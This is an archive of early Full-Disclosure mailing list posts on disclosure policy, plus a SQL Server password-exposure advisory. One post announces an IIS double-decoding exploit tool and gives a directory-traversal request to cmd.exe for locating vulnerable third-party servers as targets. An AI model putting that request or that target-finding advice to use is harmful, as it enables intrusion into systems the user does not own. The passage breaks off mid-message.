From len at NETSYS.COM Tue Jul 9 16:53:29 2002 From: len at NETSYS.COM (len at NETSYS.COM) Date: Tue, 9 Jul 2002 11:53:29 -0400 Subject: [Full-Disclosure] Testing Message-ID: <200207091553.LAA16433@ironic.netsys.com> Testing List From weld at vulnwatch.org Wed Jul 10 22:44:24 2002 From: weld at vulnwatch.org (Chris Wysopal) Date: Wed, 10 Jul 2002 21:44:24 +0000 (GMT) Subject: [Full-Disclosure] full disclosure lists Message-ID: Vulnwatch is another full disclosure mailing list. It is an advisory only list. No discussions, just advisories. We have 3 moderators: RFP, Steve Manzuik, and me. Information is available at www.vulnwatch.org. We have been in operation for just about a year. We have never delayed or rejected a posting that contained new vulnerability information. We have over 4000 subscribers. People interested in just the advisories and not the discussions that frequently crop up on security lists may want to check us out. Cheers, Weld Pond Moderator From steve at entrenchtech.com Thu Jul 11 01:27:39 2002 From: steve at entrenchtech.com (Steve) Date: Wed, 10 Jul 2002 18:27:39 -0600 Subject: [Full-Disclosure] ANNOUNCEMENT - CSICON In-Reply-To: Message-ID: <000001c22871$c6d812a0$6401a8c0@Laptop2> This is just a friendly reminder that the July 15th date for early registration is fast approaching. Also, the speakers have been finalized and the conference schedule is online at www.csicon.net/schedule.pdf =================================== Computer Security & Intelligence Conference Calgary, Alberta, Canada August 19-21 - The Hyatt Regency Cost - $1,300 (US Funds) Before July 15 Cost - $1,500 (US Funds) After July 15 ================================== The First Annual Computer Security & Intelligence Conference (CSICON) is being held from August 19-21 and the Calgary Hyatt Regency. Sponsored by Entrench Technologies, VulnWatch, and Syngress Media this conference promises to provide attendees with useful technical security knowledge. The following people will be providing keynote talks during the lunch hour (lunch will be provided); Mark Loveless (aka Simple Nomad) - BindView Corporation / NMRC.ORG - Stealth Communications Matt Conover (aka Shok) - Entercept / WooWoo.ORG - Microsoft .NET Gerhard Eschelbeck & Sanket Naik - Qualys Inc. - Distributed Vulnerability Management Additionally, the following people will be speaking throughout the conference; Ken Pfeil - Windows 2000 RootKits Robert Slade - Forensic Programming Kurt Surfried - Secure Data Deletion (Data retrieval/forensics) Nathan Einwechter - Distributed Intrusion Detection Michael Legary - x86 ShellCode & Intrusion Detection Larry Leibrock - Windows XP Forensics Manny Masongsong - Computer Crime Mike Sues - Buffer Overflows Ron DuFresne - Wireless Security Eric Hines - VPN Abuse Nathan Einwechter - Distributed Intrusion Detection Craig Ozancin - Linux Security Barry Kokotailo - Wireless Defense Michael Legary - x86 Shellcode Chris Farrow - VOIP Security Evening Round Table Sessions are also being offered on the following topics; Full Disclosure hosted by Steve Manzuik Forensics hosted by John Daniele Attack & Penetration hosted by Barry Kokotailo A continental breakfast and lunch are provided during the conference. Join us Sunday (August 20th) evening for an early registrant reception and meet the speakers. For more information please visit www.csicon.net or contact the conference organizers at info at csicon.net Interested in becoming a sponsor of CSICON? Email info at csicon.net. Are you a VulnWatch subscriber? You receive a $50.00 discount for Supporting the free open disclosure mailing list. -- www.csicon.net From len at netsys.com Thu Jul 11 03:24:04 2002 From: len at netsys.com (Len Rose) Date: Wed, 10 Jul 2002 22:24:04 -0400 Subject: [Full-Disclosure] The Death Of TCP/IP [OT] Message-ID: <20020710222404.K24902@netsys.com> Check out this article on PBS: http://www.pbs.org/cringely/pulpit/pulpit20020627.html From steve at entrenchtech.com Thu Jul 11 04:12:09 2002 From: steve at entrenchtech.com (Steve) Date: Wed, 10 Jul 2002 21:12:09 -0600 Subject: [Full-Disclosure] The Death Of TCP/IP [OT] In-Reply-To: <20020710222404.K24902@netsys.com> Message-ID: <000201c22888$c16dff70$6401a8c0@Laptop2> Interesting article but I think he is wrong. Pallidium (I keep wanting to spell it Playdium - you know the big arcades in the movie theatres...) is starting to look more like an anti-piracy campaign than it is security. The true test is going to be how Pallidium compliant hardware will react to non-Pallidium operating systems. In the article the guy talks about "TCP/MS" -- this will never work. MS owns the home and corporate desktops, but there are way too many legacy boxes on the Internet and way too many legacy applications that require *NIX boxes to run. What does this mean? This means that TCP/IP can never be replaced until these applications are replaced. This is something that isn't going to happen for a very long time if at all. Even if the whole TCP/MS thing came to be, what is going to stop people from simply keeping their legacy TCP/IP networks and ignore MS boxes? I highly doubt anyone on this mailing list depends on MSN or any MS product to use the Internet (strangely enough I am typing this on an XP box...arrrgh). MS is taking a huge step toward becoming completely proprietary.....hasn't history taught them how successful proprietary systems have been? One interesting thing that no one seems to have mentioned - the Intel CPU Serial # that caused an uproar a few years back. They exist, disabled by default in the BIOS, but I am willing to bet that this will be a key part in Palladium -- MS is going to need a way to identify each computer -- so that means either MAC addresses (which have proven to have duplicates and can be easily spoofed) or CPU ID # / Serial #. Hello.....big brother......... Of course this is mostly speculation but time will tell. I for one cannot wait for more complete technical details. Regards; Steve Manzuik Founder & Technical Lead Entrench Technologies www.entrenchtech.com Moderator - VulnWatch www.vulnwatch.org -=-=-=-=-=-=-=-=-=-=-=-www.csicon.net=-=-=-=-=-=-=-=-=-=-=- > -----Original Message----- > From: full-disclosure-admin at lists.netsys.com > [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Len Rose > Sent: Wednesday, July 10, 2002 8:24 PM > To: full-disclosure at lists.netsys.com > Subject: [Full-Disclosure] The Death Of TCP/IP [OT] > > > > Check out this article on PBS: > http://www.pbs.org/cringely/pulpit/pulpit20020> 627.html > > > > _______________________________________________ > > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-> disclosure > From techs at obfuscation.org Thu Jul 11 05:47:33 2002 From: techs at obfuscation.org (Erik Fichtner) Date: Thu, 11 Jul 2002 00:47:33 -0400 Subject: [Full-Disclosure] full disclosure lists Message-ID: <20020711044732.GE10584@obfuscation.org> ...from the archives, Weld Pond wrote: > Vulnwatch is another full disclosure mailing list. It is an advisory only > list. No discussions, just advisories. We have 3 moderators: RFP, Steve > Manzuik, and me. Information is available at www.vulnwatch.org. I dunno, weld. Naming the list "full-disclosure" certainly beats the point home with more force than "vulnwatch". ;) (not that I'm knocking vulnwatch.) Of course, there's also the Yet-Another-Mailing-List factor. [1] Then, there's also the added irony of the list archives only being available to list members. But it's a brand new list, so I'll not make too much noise about that. ...we could get into a debate about targeted email advertisements while we're waiting for things to get started. That'd probably be off-topic, though. [1] (although, that's not exactly a bad thing.. I, personally, get so much crap in my inbox that when serious issues do crop up, they're often crossposted to all N mailing lists, which makes it stand out a little. ...And some lists deliver faster than others...) -- Erik Fichtner; Unix Ronin http://www.obfuscation.org/techs/ "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, 1759 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 238 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/93ef0aea/attachment.bin From steve at entrenchtech.com Thu Jul 11 06:04:54 2002 From: steve at entrenchtech.com (Steve) Date: Wed, 10 Jul 2002 23:04:54 -0600 Subject: [Full-Disclosure] full disclosure lists In-Reply-To: <20020711044732.GE10584@obfuscation.org> Message-ID: <001101c22898$81abb890$6401a8c0@Laptop2> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Of course, there's also the Yet-Another-Mailing-List factor. [1] > The more the merrier. Having only one or two mailing lists that report vulnerabilities is like having only one or two newspapers. The key difference between VulnWatch and this new and welcomed addition, is the fact that VulnWatch doesn't allow the discussions. This was done because many complained that their mailbox would have 300+ messages a day which makes it easy to miss the important stuff.. > Then, there's also the added irony of the list archives only > being available to list members. But it's a brand new list, > so I'll not > make too much noise about that. Well, at least they have list archives. :-) Ours are still at Neohapsis, mostly a time thing for us as all of the VulnWatch moderators have day jobs that constantly run into after hours.....blah... > [1] (although, that's not exactly a bad thing.. I, > personally, get so much > crap in my inbox that when serious issues do crop up, they're > often crossposted to all N mailing lists, which makes it > stand out a little. ...And some lists deliver faster than > others...) One of the issues that causes a delay in message delivery is the subscriber base. I know this was definitely true with Listserv -- the first few people to subscribe get messages nice and quick while the last few get messages much later. Take Bugtraq for example, if you are subscriber 10 you will most likely see the message long before subscriber 20000 sees it. Mind you now that they are off of Listserv this problem might have been addressed. I have yet to do any performance testing for VulnWatch. Unfortunately, cross posting is the only bad side to multiple mailing lists. Regards; Steve Manzuik Founder & Technical Lead Entrench Technologies www.entrenchtech.com Moderator - VulnWatch www.vulnwatch.org - -=-=-=-=-=-=-=-=-=-=-=- www.csicon.net -=-=-=-=-=-=-=-=-=-=-=- -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPS0R9WWolZy6IFPhEQKBHQCglN9/EeJnXL/tlvf2ctRAp5JfjHEAn3Ui 5y5Z8hFLNQ92fwsD9SladIF2 =JMyf -----END PGP SIGNATURE----- From Simon.Richter at phobos.fachschaften.tu-muenchen.de Thu Jul 11 12:42:16 2002 From: Simon.Richter at phobos.fachschaften.tu-muenchen.de (Simon Richter) Date: Thu, 11 Jul 2002 13:42:16 +0200 (CEST) Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <200207110346.g6B3khX29736@netsys.com> Message-ID: Hi, > We are pleased to announce the creation of a new security mailing list > dedicated to FULL DISCLOSURE. When Scott Chasin handed over the bugtraq > mailing list, it was clearly dedicated to the immediate and full > dissemination of security issues. The current bugtraq mailing list has > changed over the years, and some of us feel it has changed for the worse. To me, the term "full disclosure" does not mean "make it available as fast as possible", but rather "here is the information, expect it to leak in the next two weeks, so go out and fix the bug". The current bugtraq scheme enforces that, and I believe they are doing a great job. By creating a forum in which vulnerability spotters can get "instant fame", you are forcing software vendors to monitor the forum 24/7, as a new vulnerability in their software could be disclosed anytime, and at the moment it is disclosed, script kiddies are hacking it into their scanners while it could be 4 am in the vendor's timezone. If we are lucky enough that the vulnerability is spotted by a whitehat, we should not jeopardize the time advantage we have by announcing it publically. In short, I think this is a bad idea because it adds confusion for the vulnerability spotters, risks early disclosure before fixes are available and thus harms the users. Simon -- GPG public key available from http://phobos.fs.tum.de/pgp/Simon.Richter.asc Fingerprint: 040E B5F7 84F1 4FBC CEAD ADC6 18A0 CC8D 5706 A4B4 From johnc at grok.org.uk Thu Jul 11 14:57:26 2002 From: johnc at grok.org.uk (John Cartwright) Date: Thu, 11 Jul 2002 14:57:26 +0100 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: References: <200207110346.g6B3khX29736@netsys.com> Message-ID: <20020711135726.GA27619@www1.grok.org.uk> On Thu, Jul 11, 2002 at 01:42:16PM +0200, Simon Richter wrote: Simon, You may wish to subscribe to the list so that you and others may debate this issue. The list is configured so that non-members may not post. > To me, the term "full disclosure" does not mean "make it available as fast > as possible", but rather "here is the information, expect it to leak in > the next two weeks, so go out and fix the bug". The current bugtraq scheme > enforces that, and I believe they are doing a great job. We are placing the responsibility with the individual, not with an organisation here. What we do not believe in is having a situation where a select few are aware of a problem, but 99% of the internet populace are powerless to defend against it. We are not saying that the vendor should not be informed, we are saying, inform the people and the vendor simultaneously. > By creating a forum in which vulnerability spotters can get "instant > fame", you are forcing software vendors to monitor the forum 24/7, as a > new vulnerability in their software could be disclosed anytime, and at the > moment it is disclosed, script kiddies are hacking it into their scanners > while it could be 4 am in the vendor's timezone. If we are lucky enough > that the vulnerability is spotted by a whitehat, we should not jeopardize > the time advantage we have by announcing it publically. This situation already occurs. If a researcher leaks information to a few 'allies', if a technique is discovered 'in the wild', or if a vendor silently fixes unknown problems, then there are those who possess the knowledge and those that don't. We are simply providing a forum for those who wish to try and balance out this situation. > In short, I think this is a bad idea because it adds confusion for the > vulnerability spotters, risks early disclosure before fixes are available > and thus harms the users. Early disclosure is important, IMO, as was proved with the recent Apache flaw. I believe there were reports of Gobbles' exploit being active in the wild long before the patched packages were available, and being alerted to the problem even if there was no fix would have at least given admins a 'heads-up' and allowed people to make informed business decisions. Of course, this is our personal opinion, but we hope that others concur and wish to share in our resource. - John From SkyLined at edup.tudelft.nl Thu Jul 11 16:28:06 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Thu, 11 Jul 2002 17:28:06 +0200 Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer Message-ID: <000e01c228ef$8e547670$1b59a182@grotedoos> (Ok, it's an old bug but since a lot of non-geeks seem to hate updating their IIS, there still are plenty of valid targets for this exploit.) -- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED -- The attached file IISexploere.php is my "SCRIPT KIDDIE COMPATIBLE" exploit for the double urldecoding bug in IIS. (It's a modified version of PHPexplorer, also written by yours truly ;) -- HOW TO INSTALL -- Simply put all the icons in the RAR file and the file IISexplorer.php on your PHP enabled webserver. The icons should go into the /icons2/ directory, the IISexplorer.php file can be put anywere. -- HOW TO USE -- Browse to http://your-server/path/IISexplorer.php?host=[ip of vulnerable target] and you can browse the target system using an explorer style interface. Please remember, this is version 0.1 beta! So don't expect it to handle errors well. -- WHERE TO FIND TARGETS TO EXPLORE -- Scan your webserver's logfiles for "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" to get a list of vulnerable IIS's that have been infected with a worm that propagates through this vulnerability. -- NOTES -- The left frame takes some time to load, since it requires 1 http request for each directory in the list. Make sure to have a decent connection to the internet because this migth use quite some bandwidth ;) -- FUTURE VERSIONS -- I'm probably not gonna invest more time, since it works. Maybe I'm gonna put in a upload/download facility but that would make stuff a bit too easy for them 14 year olds, wouldn't it ? -- YOURS TRULY -- Berend-Jan Wever aka SkyLined http:/spoor12.edup.tudelft.nl . -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/dc1dbbdb/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: IISexplorer.php Type: application/octet-stream Size: 15194 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/dc1dbbdb/attachment.obj -------------- next part -------------- A non-text attachment was scrubbed... Name: icons2.rar Type: application/x-rar-compressed Size: 16360 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/dc1dbbdb/attachment.bin From BlueBoar at thievco.com Thu Jul 11 17:04:21 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 11 Jul 2002 09:04:21 -0700 Subject: [Full-Disclosure] Re: Announcing new security mailing list References: Message-ID: <3D2DAC85.4010200@thievco.com> Simon Richter wrote: > To me, the term "full disclosure" does not mean "make it available as fast > as possible", but rather "here is the information, expect it to leak in > the next two weeks, so go out and fix the bug". The current bugtraq scheme > enforces that, and I believe they are doing a great job. There is no Bugtraq "scheme". The Bugtraq moderator does not hold any posts. The poster gets to decide when his informatino is released. The people who post to Bugtraq as just as able to blindside a vendor as on any other mailing list. The closest thing to what you describe that is offered by SecurityFocus is the vulnhelp service. This is a way for someone who finds a bug to voluntarily dump the hassle of dealing with notifying the vendor and waiting onto the SecurityFOcus staff. Someone who uses vulnhelp still wants to give the vendor advanced notice, they just don't want to do it themselves. If they don't want the vendor to have any warning, they just post to Bugtraq. BB From steve at videogroup.com Thu Jul 11 17:13:40 2002 From: steve at videogroup.com (Steve) Date: Thu, 11 Jul 2002 12:13:40 -0400 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <20020711135726.GA27619@www1.grok.org.uk> References: <200207110346.g6B3khX29736@netsys.com> <20020711135726.GA27619@www1.grok.org.uk> Message-ID: On Thursday 11 July 2002 09:57 am, you wrote: >Early disclosure is important, IMO, as was proved with the recent Apache > flaw. I believe there were reports of Gobbles' exploit being active in the > wild long before the patched packages were available, and being alerted to > the problem even if there was no fix would have at least given admins a > 'heads-up' and allowed people to make informed business decisions. Of > course, this is our personal opinion, but we hope that others concur and > wish to share in our resource. The choice is between helping those who work hard to stay on top of security issues and those who don't. (Rest assure that the underground knows about holes very early on, often before bugtrack reports it. Even if they don't on any single issues, that policy is still too high of a risk to gamble on.) It is clear that if you are at least aware of the situation you can decide how or what you want to do about it. You can disable, modify or ignore it, and even push the developer to do it, but at least it's your call. Some animals in the wild use the defense of being one of many as their defense from being targeted as dinner. However obscurity is only slightly better than nothing. The fact that most admins don't understand or have the time readily available to spend on security is a flaw, a deviation from the ideal scene and cannot be used as an excuse to put those who work hard to keep security in, at risk. It is a sad reflection of society at large that we have to go through all this pain just to operate a business, but it is also the world we live in so get organized and do what you can to stay on top of it. -- Steve Szmidt V.P. Information Technology Video Group Distributors, Inc. From marcs at znep.com Thu Jul 11 17:22:45 2002 From: marcs at znep.com (Marc Slemko) Date: Thu, 11 Jul 2002 09:22:45 -0700 (PDT) Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <3D2DAC85.4010200@thievco.com> Message-ID: On Thu, 11 Jul 2002, Blue Boar wrote: > Simon Richter wrote: > > To me, the term "full disclosure" does not mean "make it available as fast > > as possible", but rather "here is the information, expect it to leak in > > the next two weeks, so go out and fix the bug". The current bugtraq scheme > > enforces that, and I believe they are doing a great job. > > There is no Bugtraq "scheme". The Bugtraq moderator does not hold any > posts. The poster gets to decide when his informatino is released. The > people who post to Bugtraq as just as able to blindside a vendor as on any > other mailing list. Speaking from personal experience, the current bugtraq moderator does, and the previous moderator also did, "hold" certain posts. The cases I have seen fall into one of two categories: 1. having doubts about the authenticity of the information in the post 2. seeing if the poster would like to voluntarily withhold it temporarily and work with vendors. Certainly, if the authenticity of the information is not in question and if the poster insists on posting it, then I have no indication that it would be withheld. I also don't have any reason to think this happens frequently. But there is an extra layer there that, in some cases, does result in submitted posts being delayed, normally with the consent of the poster. I'm not really sure of the need for a "full-disclosure" list, but time will tell. BTW, spewing "[full-disclosure]" into the subject line is a very annoying thing for a list to do. From steve at videogroup.com Thu Jul 11 17:26:56 2002 From: steve at videogroup.com (Steve) Date: Thu, 11 Jul 2002 12:26:56 -0400 Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer In-Reply-To: <000e01c228ef$8e547670$1b59a182@grotedoos> References: <000e01c228ef$8e547670$1b59a182@grotedoos> Message-ID: On Thursday 11 July 2002 11:28 am, you wrote: >(Ok, it's an old bug but since a lot of non-geeks seem to hate updating > their IIS, there still are plenty of valid targets for this exploit.) > >-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED -- >The attached file IISexploere.php is my "SCRIPT KIDDIE COMPATIBLE" exploit > for the double urldecoding bug in IIS. (It's a modified version of > PHPexplorer, also written by yours truly ;) >Berend-Jan Wever aka SkyLined >http:/spoor12.edup.tudelft.nl >. Since it looks like we are going to have tools to test holes, the policy of only releasing ones designing to test your own system for flaws, needs to be in. As Berend says we don't need to make it any easier for script kiddies. Also, this list is going to have script kiddies on it so people needs to be kept aware of not posting specifics about their network which can then be used to root them. Too often I see people giving out all sorts of information about their network on lists thinking there are only white hats on it. -- Steve Szmidt V.P. Information Technology Video Group Distributors, Inc. From cesarc56 at yahoo.com Thu Jul 11 17:32:37 2002 From: cesarc56 at yahoo.com (c c) Date: Thu, 11 Jul 2002 09:32:37 -0700 (PDT) Subject: [Full-Disclosure] SQL Server 7 & 2000 Installation process and Service Packs write encoded passwords to a file Message-ID: <20020711163237.33693.qmail@web40012.mail.yahoo.com> Security Advisory Name: SQL Server 7 & 2000 Installation process and Service Packs write encoded passwords to a file. System Affected : Sql Server 7 & 2000, latest Service Packs. Severity : High. Author: Cesar Cerrudo. Date: 07/11/2002 Advisory Number: CC070204 Overview: When installing Microsoft SQL Server or the latest SQL Server Service Packs, some files are created and not properly removed. These files are designed to be used for unattended installs. During the installation, values such as Windows user accounts, login names and passwords are saved in these files. Details: After installing Microsoft SQL Server or the latest SQL Server Service Packs, one or more copies of the file setup.iss are not properly removed from the operating system. Two copies of setup.iss are created depending on the version of SQL Server. Setup.iss is created in one or more of the following directories: %windir% %sqlserverinstance%\install\ The copy of the file in the %windir% directory is created with the permissions "Full Control" granted to the "Everyone" group. The other copy of the file are created without weak permissions. If SQL Server is set to Mixed Mode Authentication, the SQL Server login and password used by the installation program are saved in the setup.iss files. If SQL Server Service is set to run under a Windows user account different than system account during the installation process, that Windows user account and password are saved in the setup.iss files. The passwords are encoded using a weak algorithm. The encoded password can be easily broken without understanding the encoding algorithm using the Installation process or the Service Pack with chosen plain text attack. Any user with access to the setup.iss file could decode the password and gain unauthorized access to SQL Server. More Details: http://www.appsecinc.com/resources/alerts/mssql/02-0009.html Vendor Status : Microsoft was contacted on May 07, 2002. We worked together and Microsoft released security bulletin and a fix. Patch Available : http://www.microsoft.com/technet/security/bulletin/MS02-035.asp Workaround : Delete the SQL Server setup.iss files created when SQL Server is installed or when a Service Pack is installed. Change the passwords that might be exposed by this vulnerability. Thanks!: Special thanks to Aaron Newman (Application Security, Inc.) for his collaboration in testing and advisory draft, and to Raul Aguerrebehere for his contribution of many setup.iss files. __________________________________________________ Do You Yahoo!? Sign up for SBC Yahoo! Dial - First Month Free http://sbc.yahoo.com From poptix at techmonkeys.org Thu Jul 11 18:00:54 2002 From: poptix at techmonkeys.org (Matthew S. Hallacy) Date: Thu, 11 Jul 2002 12:00:54 -0500 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <3D2DAC85.4010200@thievco.com>; from BlueBoar@thievco.com on Thu, Jul 11, 2002 at 09:04:21AM -0700 References: <3D2DAC85.4010200@thievco.com> Message-ID: <20020711120054.E1270@techmonkeys.org> On Thu, Jul 11, 2002 at 09:04:21AM -0700, Blue Boar wrote: > There is no Bugtraq "scheme". The Bugtraq moderator does not hold any > posts. The poster gets to decide when his informatino is released. The > people who post to Bugtraq as just as able to blindside a vendor as on any > other mailing list. > > The closest thing to what you describe that is offered by SecurityFocus is > the vulnhelp service. This is a way for someone who finds a bug to > voluntarily dump the hassle of dealing with notifying the vendor and > waiting onto the SecurityFOcus staff. Someone who uses vulnhelp still > wants to give the vendor advanced notice, they just don't want to do it > themselves. If they don't want the vendor to have any warning, they just > post to Bugtraq. > > BB I disagree, I think my DOCSIS vulnerability posting is a good example of something that should have gone out immediately, but was /never/ posted. ( I ended up taking it to another list) It was valid, the vendors knew, but it was withheld because you deemed it 'malicious'. -- Matthew S. Hallacy FUBAR, LART, BOFH Certified http://www.poptix.net GPG public key 0x01938203 From poptix at techmonkeys.org Thu Jul 11 18:04:14 2002 From: poptix at techmonkeys.org (Matthew S. Hallacy) Date: Thu, 11 Jul 2002 12:04:14 -0500 Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer In-Reply-To: ; from steve@videogroup.com on Thu, Jul 11, 2002 at 12:26:56PM -0400 References: <000e01c228ef$8e547670$1b59a182@grotedoos> Message-ID: <20020711120414.F1270@techmonkeys.org> On Thu, Jul 11, 2002 at 12:26:56PM -0400, Steve wrote: > Since it looks like we are going to have tools to test holes, the policy of > only releasing ones designing to test your own system for flaws, needs to be > in. As Berend says we don't need to make it any easier for script kiddies. > Unfortunately the exploits that are found on the rooted box are pretty much never anti-script kiddie, and the problem with subtle breakage of remote scripts is that it makes it very hard for joe-blow network admin to prove that there /is/ a vulnerability to the people he has to okay a maintenance window with. [snip] > Steve Szmidt -- Matthew S. Hallacy FUBAR, LART, BOFH Certified http://www.poptix.net GPG public key 0x01938203 From steve at entrenchtech.com Thu Jul 11 18:00:47 2002 From: steve at entrenchtech.com (Steve) Date: Thu, 11 Jul 2002 11:00:47 -0600 Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer References: <000e01c228ef$8e547670$1b59a182@grotedoos> Message-ID: <003501c228fc$80fa4470$f954b8a1@entrenchtech.com> So how hard is it going to be to take a tool/script that only tests localhost and modify it to test other hosts? There is really no point in forcing localhost as it won't stop anyone. Regards; Steve Manzuik Founder & Technical Lead Entrench Technologies www.entrenchtech.com Moderator - VulnWatch www.vulnwatch.org www.csicon.net ----- Original Message ----- From: "Steve" To: Sent: Thursday, July 11, 2002 10:26 AM Subject: Re: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer > On Thursday 11 July 2002 11:28 am, you wrote: > >(Ok, it's an old bug but since a lot of non-geeks seem to hate updating > > their IIS, there still are plenty of valid targets for this exploit.) > > > >-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED -- > >The attached file IISexploere.php is my "SCRIPT KIDDIE COMPATIBLE" exploit > > for the double urldecoding bug in IIS. (It's a modified version of > > PHPexplorer, also written by yours truly ;) > > >Berend-Jan Wever aka SkyLined > >http:/spoor12.edup.tudelft.nl > >. > > Since it looks like we are going to have tools to test holes, the policy of > only releasing ones designing to test your own system for flaws, needs to be > in. As Berend says we don't need to make it any easier for script kiddies. > > Also, this list is going to have script kiddies on it so people needs to be > kept aware of not posting specifics about their network which can then be > used to root them. Too often I see people giving out all sorts of information > about their network on lists thinking there are only white hats on it. > -- > > Steve Szmidt > V.P. Information Technology > Video Group Distributors, Inc. > _______________________________________________ > Full-Disclosure mailing list > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From techs at obfuscation.org Thu Jul 11 18:51:29 2002 From: techs at obfuscation.org (Erik Fichtner) Date: Thu, 11 Jul 2002 13:51:29 -0400 Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer In-Reply-To: <003501c228fc$80fa4470$f954b8a1@entrenchtech.com> References: <000e01c228ef$8e547670$1b59a182@grotedoos> <003501c228fc$80fa4470$f954b8a1@entrenchtech.com> Message-ID: <20020711175128.GF10584@obfuscation.org> On Thu, Jul 11, 2002 at 11:00:47AM -0600, Steve wrote: > So how hard is it going to be to take a tool/script that only tests > localhost and modify it to test other hosts? There is really no point in > forcing localhost as it won't stop anyone. That, and it's an extra time-wasting step for a lot of admins who want to scan their entire network to make sure they know where everything they need to go fix is.. (Not everyone has well documented networks. I'd speculate that most do not have well documented networks.) That said, it might be nicer if more folks released Nessus NASL scripts for testing purposes instead of half a dozen marginally broken tools, but that probably won't ever happen. [1] Admins responsible for the security of their networks need to be made aware that there are problems, and they need to have adequate tools to tell them exactly what they need to fix, and to prove that it's been fixed. This in a world where many admins know less about security then the average script kiddie. [1] In my perfect world, every responsible advisory for a remote attack would come with both a working NASL script to test it, and a set of well written snort signatures to spot the attack in progress. C'mon guys, you did all the work to discover and exploit the flaw, do a little more and tell us how to watch for it while you're at it. (if that doesn't start an argument of some sort, I don't know what will.) -- Erik Fichtner; Unix Ronin http://www.obfuscation.org/techs/ "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, 1759 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 238 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/099180f3/attachment.bin From dufresne at winternet.com Thu Jul 11 19:10:29 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Thu, 11 Jul 2002 13:10:29 -0500 (CDT) Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: Message-ID: On Thu, 11 Jul 2002, Marc Slemko wrote: [SNIP] > > BTW, spewing "[full-disclosure]" into the subject line is a very annoying > thing for a list to do. > Actually, it makes it quite easy for procmail recipies and certain mail readers to filter and categorize the messages. What gets annoying is when there's a ton of html crap preceeding messages, or those folks spewing vactions into the lists. Not to mention those danged content filters that are set to prevent folks from being offended by words like damn... Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From pauls at utdallas.edu Thu Jul 11 19:12:44 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Thu, 11 Jul 2002 13:12:44 -0500 Subject: [Full-Disclosure] On Full Disclosure, broken scripts, life, the universe, and everything... Message-ID: <871080DEC5874D41B4E3AFC5C400611E02653249@UTDEVS02.campus.ad.utdallas.edu> As for the rest of the world?????........ Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Jay D. Dyson [mailto:jdyson at treachery.net] > Sent: Thursday, July 11, 2002 1:01 PM > To: Full Disclosure List > Subject: [Full-Disclosure] On Full Disclosure, broken > scripts, life, the universe, and everything... > > > All of these dilemmas regarding Full Disclosure escape > me for the simple reason that I view Full Disclosure with the > same philosophical frame as I view our rights as enumerated > by the Constitution of the United States. From shamrock at cypherpunks.to Thu Jul 11 19:56:47 2002 From: shamrock at cypherpunks.to (Lucky Green) Date: Thu, 11 Jul 2002 11:56:47 -0700 Subject: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #3 - 11 msgs In-Reply-To: <200207111812.g6BIC3n29922@netsys.com> Message-ID: <003c01c2290c$b6b1b0c0$6501a8c0@LUCKYVAIO> Ron wrote quoting Marc: > > BTW, spewing "[full-disclosure]" into the subject line is a very > > annoying thing for a list to do. > > > > Actually, it makes it quite easy for procmail recipies and > certain mail readers to filter and categorize the messages. > What gets annoying is when there's a ton of html crap > preceeding messages, or those folks spewing vactions into the > lists. Not to mention those danged content filters that are > set to prevent folks from being offended by words like damn... I believe most MUAs nowadays can filter on headers other than just Subject. I use: :0: * ^List-Id:.*full-disclosure.lists.netsys.com Lists/Full-Disclosure --Lucky From Simon.Richter at phobos.fachschaften.tu-muenchen.de Thu Jul 11 21:01:33 2002 From: Simon.Richter at phobos.fachschaften.tu-muenchen.de (Simon Richter) Date: Thu, 11 Jul 2002 22:01:33 +0200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <20020711135726.GA27619@www1.grok.org.uk> Message-ID: <00474B8E-9509-11D6-B142-000A278CBB1A@phobos.fs.tum.de> Hi, >> To me, the term 